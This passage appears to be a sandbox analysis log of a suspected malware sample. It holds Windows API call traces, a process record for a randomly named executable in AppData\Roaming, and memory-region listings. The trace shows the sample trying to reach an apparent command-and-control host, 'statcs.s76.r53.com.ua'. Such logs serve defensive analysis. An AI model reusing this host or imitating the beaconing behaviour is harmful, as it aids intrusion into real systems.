lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] VirtualFree (lpAddress=0x13c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.950] FreeLibrary (hLibModule=0x76910000) returned 1 [0096.950] LocalFree (hMem=0x274448) returned 0x0 [0096.950] FreeLibrary (hLibModule=0x76910000) returned 1 [0096.950] LocalFree (hMem=0x274438) returned 0x0 [0096.950] ExitProcess (uExitCode=0x0) Thread: id = 10 os_tid = 0xaf8 [0093.866] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.866] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x14b8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0093.866] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x14f1ffc, cbMultiByte=27, lpWideCharStr=0x19eed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0094.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0094.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x14aa714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0094.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x14b867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0094.534] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x19efb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19efbac | out: ppResult=0x19efbac*=0x0) returned 11001 [0096.298] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x19efb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19efbac | out: ppResult=0x19efbac*=0x0) returned 11001 [0096.402] getnameinfo (in: pSockaddr=0x19efc14, SockaddrLength=0x0, pNodeBuffer=0x140831c, NodeBufferSize=0x401, pServiceBuffer=0x14d5124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="", pServiceBuffer="") returned 10047 [0096.402] htons (hostshort=0x0) returned 0x0 [0096.402] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0096.402] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] SetEvent (hEvent=0x84) returned 1 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] CloseHandle (hObject=0xb8) returned 1 [0096.402] RtlExitUserThread (Status=0x0) Thread: id = 17 os_tid = 0xb64 Process: id = "9" image_name = "xey8d7zi.exe" filename = "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe" page_root = "0x7ea16700" os_pid = "0xaec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xacc" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 566 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 567 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 568 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 569 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 570 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 571 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 572 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 573 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 574 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 606 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 607 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 608 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 609 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 610 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 611 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 612 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 613 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 614 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 615 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 616 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 617 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 618 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 619 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 620 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 621 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 622 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 623 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 624 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 625 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 626 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 627 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 628 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 629 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 630 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 631 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 632 start_va = 0x1230000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 633 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 634 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 635 start_va = 0x1370000 end_va = 0x150ffff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 636 start_va = 0x1510000 end_va = 0x17defff entry_point = 0x1510000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 637 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 638 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 726 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 727 start_va = 0x17e0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017e0000" filename = "" Region: id = 728 start_va = 0x1bf0000 end_va = 0x1ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 729 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 730 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 731 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 732 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 733 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 734 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 735 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 736 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 737 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 738 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 739 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 740 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 741 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 742 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 743 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 744 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 745 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 746 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 747 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 748 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 749 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 750 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 751 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 752 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 753 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 754 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 755 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 756 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 757 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 758 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 759 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 760 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 761 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 762 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 763 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 764 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 765 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 766 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 767 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 768 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 769 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 770 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 771 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 772 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 775 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 776 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 777 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 778 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 779 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 780 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 781 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 782 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 783 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 784 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 785 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 786 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 787 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 788 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 789 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 790 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 791 start_va = 0x17e0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017e0000" filename = "" Region: id = 792 start_va = 0x1bf0000 end_va = 0x1ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 793 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 794 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 795 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 796 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 797 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 798 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 799 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 800 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 801 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 802 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 803 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 804 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 805 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 806 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 807 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 808 start_va = 0x3a0000 